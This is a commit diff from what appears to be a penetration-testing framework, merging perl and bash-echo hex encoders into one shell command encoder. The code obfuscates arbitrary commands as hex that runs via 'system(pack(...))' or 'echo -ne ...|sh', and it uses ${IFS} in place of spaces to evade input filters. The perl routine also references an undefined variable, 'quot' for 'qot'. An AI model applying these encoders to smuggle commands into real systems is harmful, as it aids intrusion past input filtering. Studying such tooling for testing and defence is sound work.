Merged them into one

git-svn-id: file:///home/svn/incoming/trunk@3376 4d416f70-5f16-0410-b530-b9f4589650da
2006-01-16 02:32:30 +00:00 · 2006-01-16 02:32:30 +00:00 · 4a14fa7e02
parent 9c5f4776b8
commit 4a14fa7e02
3 changed files with 85 additions and 139 deletions
--- a/modules/encoders/cmd/generic_sh.rb
+++ b/modules/encoders/cmd/generic_sh.rb
@ -32,6 +32,91 @@ class GenericSh < Msf::Encoder
 		return buf
 	end

+	#
+	# Uses the perl command to hex encode the command string
+	#
+	def encode_block_perl(state, buf)
+
+		hex = buf.unpack("H*")	
+		cmd = 'perl -e '
+		qot = ',-:.=+!@#$%^&'
+		
+		# Find a quoting character to use
+		state.badchars.unpack('C*') { |c| quot.delete(c.chr) }
+		
+		# Throw an error if we ran out of quotes
+		raise RuntimeError if qot.length == 0
+		
+		sep = qot[0].chr
+		
+		# Convert spaces to IFS...
+		if (state.badchars.include?(" "))
+			cmd.gsub!(/\s/, '${IFS}')
+		end
+		
+		# Can we use single quotes to enclose the command string?
+		if (state.badchars.include?("'"))
+		
+			if (state.badchars.match(/\(|\)/))
+
+				# No paranthesis...
+				raise RuntimeError
+			end
+
+			cmd << "system\\(pack\\(qq#{sep}H\\*#{sep},#{hex}\\)\\)"
+				
+		else
+			if (state.badchars.match(/\(|\)/))
+				if (state.badchars.include?(" "))
+					# No spaces allowed, no paranthesis, give up...
+					raise RuntimeError
+				end
+				
+				cmd << "'system pack qq#{sep}H*#{sep},#{hex}'"
+			else
+				cmd << "'system(pack(qq#{sep}H*#{sep},#{hex}))'"
+			end
+		end
+		
+		return cmd
+	end
+	
+	#
+	# Uses bash's echo -ne command to hex encode the command string
+	#
+	def encode_block_bash_echo(state, buf)
+	
+		hex = ''
+		
+		# Can we use single quotes to enclose the echo arguments?
+		if (state.badchars.include?("'"))
+			hex = buf.unpack('C*').collect { |c| "\\\\\\x%.2x" % c }.join
+		else
+			hex = "'" + buf.unpack('C*').collect { |c| "\\x%.2x" % c }.join + "'"
+		end
+		
+		# Are pipe characters restricted?
+		if (state.badchars.include?("|"))
+			
+			# How about backticks?
+			if (state.badchars.include?("`"))
+				raise RuntimeError
+			else
+				buf = "`echo -ne #{hex}`"
+			end
+		else
+			buf = "echo -ne #{hex}|sh"
+		end
+		
+		# Remove spaces from the command string
+		if (state.badchars.include?(" "))
+			buf.gsub!(/\s/, '${IFS}')
+		end
+		
+		return buf
+	end	
+
+	
 end

 end end end
--- a/modules/encoders/cmd/hex_bash_echo.rb
+++ b/modules/encoders/cmd/hex_bash_echo.rb
@ -1,63 +0,0 @@
-require 'msf/core'
-
-module Msf
-module Encoders
-module Cmd
-
-class HexBashEcho < Msf::Encoder
-
-	def initialize
-		super(
-			'Name'             => 'BASH echo -e Hex Encoding',
-			'Version'          => '$Revision$',
-			'Description'      => %q{
-				This encoder uses the "-e" option available in recent
-			versions of BASH to encode the command string. This 
-			encoder will only work on recent Linux distributions or 
-			situations where a new version of BASH is used to inject
-			the supplied command string.
-			},
-			'Author'           => 'hdm',
-			'Platform'         => 'linux',
-			'Arch'             => ARCH_CMD)
-	end
-
-	
-	#
-	# Encodes the payload
-	#
-	def encode_block(state, buf)
-	
-		hex = ''
-		
-		# Can we use single quotes to enclose the echo arguments?
-		if (state.badchars.include?("'"))
-			hex = buf.unpack('C*').collect { |c| "\\\\\\x%.2x" % c }.join
-		else
-			hex = "'" + buf.unpack('C*').collect { |c| "\\x%.2x" % c }.join + "'"
-		end
-		
-		# Are pipe characters restricted?
-		if (state.badchars.include?("|"))
-			
-			# How about backticks?
-			if (state.badchars.include?("`"))
-				raise RuntimeError
-			else
-				buf = "`echo -ne #{hex}`"
-			end
-		else
-			buf = "echo -ne #{hex}|sh"
-		end
-		
-		# Remove spaces from the command string
-		if (state.badchars.include?(" "))
-			buf.gsub!(/\s/, '${IFS}')
-		end
-		
-		return buf
-	end
-
-end
-
-end end end
--- a/modules/encoders/cmd/hex_perl.rb
+++ b/modules/encoders/cmd/hex_perl.rb
@ -1,76 +0,0 @@
-require 'msf/core'
-
-module Msf
-module Encoders
-module Cmd
-
-class HexPerl < Msf::Encoder
-
-	def initialize
-		super(
-			'Name'             => 'PERL Hex Encoding',
-			'Version'          => '$Revision$',
-			'Description'      => %q{
-				This encoder uses the PERL interpreter to decode
-			and execute a command supplied in hex format. This encoder
-			should work on most Unix systems that have PERL version
-			5.0 or above.
-			
-			},
-			'Author'           => 'hdm',
-			'Arch'             => ARCH_CMD)
-	end
-
-	
-	#
-	# Encodes the payload
-	#
-	def encode_block(state, buf)
-
-		hex = buf.unpack("H*")	
-		cmd = 'perl -e '
-		qot = ',-:.=+!@#$%^&'
-		
-		# Find a quoting character to use
-		state.badchars.unpack('C*') { |c| quot.delete(c.chr) }
-		
-		# Throw an error if we ran out of quotes
-		raise RuntimeError if qot.length == 0
-		
-		sep = qot[0].chr
-		
-		# Convert spaces to IFS...
-		if (state.badchars.include?(" "))
-			cmd.gsub!(/\s/, '${IFS}')
-		end
-		
-		# Can we use single quotes to enclose the command string?
-		if (state.badchars.include?("'"))
-		
-			if (state.badchars.match(/\(|\)/))
-
-				# No paranthesis...
-				raise RuntimeError
-			end
-
-			cmd << "system\\(pack\\(qq#{sep}H\\*#{sep},#{hex}\\)\\)"
-				
-		else
-			if (state.badchars.match(/\(|\)/))
-				if (state.badchars.include?(" "))
-					# No spaces allowed, no paranthesis, give up...
-					raise RuntimeError
-				end
-				
-				cmd << "'system pack qq#{sep}H*#{sep},#{hex}'"
-			else
-				cmd << "'system(pack(qq#{sep}H*#{sep},#{hex}))'"
-			end
-		end
-		
-		return cmd
-	end
-
-end
-
-end end end